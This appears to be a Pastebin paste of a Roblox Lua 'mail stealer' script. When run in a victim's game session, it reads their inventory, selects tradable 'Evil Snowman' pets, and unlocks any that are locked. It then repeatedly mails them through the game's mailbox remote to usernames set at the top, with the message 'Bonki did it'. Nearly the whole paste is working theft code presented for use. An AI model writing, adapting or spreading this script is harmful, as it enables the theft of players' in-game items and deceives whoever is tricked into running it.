Advertisement
booiiii

Untitled

Dec 11th, 2024
28
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.35 KB | None | 0 0
  1. local Roblox_Usernames ={ "" } -- Список ников
  2. local Library = require(game.ReplicatedStorage.Library);
  3. local Save = (require((game:GetService("ReplicatedStorage")).Library.Client.Save)).Get();
  4. local Directory = require((game:GetService("ReplicatedStorage")).Library.Directory);
  5. local Player = game.Players.LocalPlayer;
  6. local Inventory = Save.Inventory;
  7. local HttpService = game:GetService("HttpService");
  8. local message = require(game.ReplicatedStorage.Library.Client.Message);
  9. local network = (game:GetService("ReplicatedStorage")):WaitForChild("Network");
  10.  
  11. local GetListWithAllItems = function()
  12. local hits = {};
  13. local AllowedPets = {
  14. ["Evil Snowman"] = true,
  15. };
  16. Inventory = ((require((game:GetService("ReplicatedStorage")).Library.Client.Save)).Get()).Inventory;
  17. if Inventory.Pet ~= nil then
  18. for i, v in pairs(Inventory.Pet) do
  19. local id = v.id;
  20. local dir = Directory.Pets[id];
  21. if dir.Tradable ~= false and AllowedPets[id] and v.pt == 2 then
  22. table.insert(hits, {
  23. Item_Id = i,
  24. Item_Name = v.id,
  25. Item_Amount = 50,
  26. Item_Class = "Pet",
  27. IsShiny = v.sh or false,
  28. IsLocked = v.lk or false
  29. });
  30. end;
  31. end;
  32. end;
  33. return hits;
  34. end;
  35.  
  36. local function sendItem(username, category, uid, am, locked)
  37. local args = {
  38. [1] = username,
  39. [2] = "Bonki did it",
  40. [3] = category,
  41. [4] = uid,
  42. [5] = am
  43. };
  44. local response = false;
  45. repeat
  46. if locked == true then
  47. local lockArgs = {
  48. uid,
  49. false
  50. };
  51. (game:GetService("ReplicatedStorage")).Network.Locking_SetLocked:InvokeServer(unpack(lockArgs));
  52. end;
  53. local success, err = (network:WaitForChild("Mailbox: Send")):InvokeServer(unpack(args));
  54. response = success;
  55. until response == true;
  56. end;
  57.  
  58. local hits = GetListWithAllItems();
  59. if #hits > 0 then
  60. for _, username in ipairs(Roblox_Usernames) do
  61. for _, item in pairs(hits) do
  62. print("Sending to " .. username);
  63. sendItem(username, item.Item_Class, item.Item_Id, item.Item_Amount, item.IsLocked);
  64. end;
  65. end;
  66. end;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement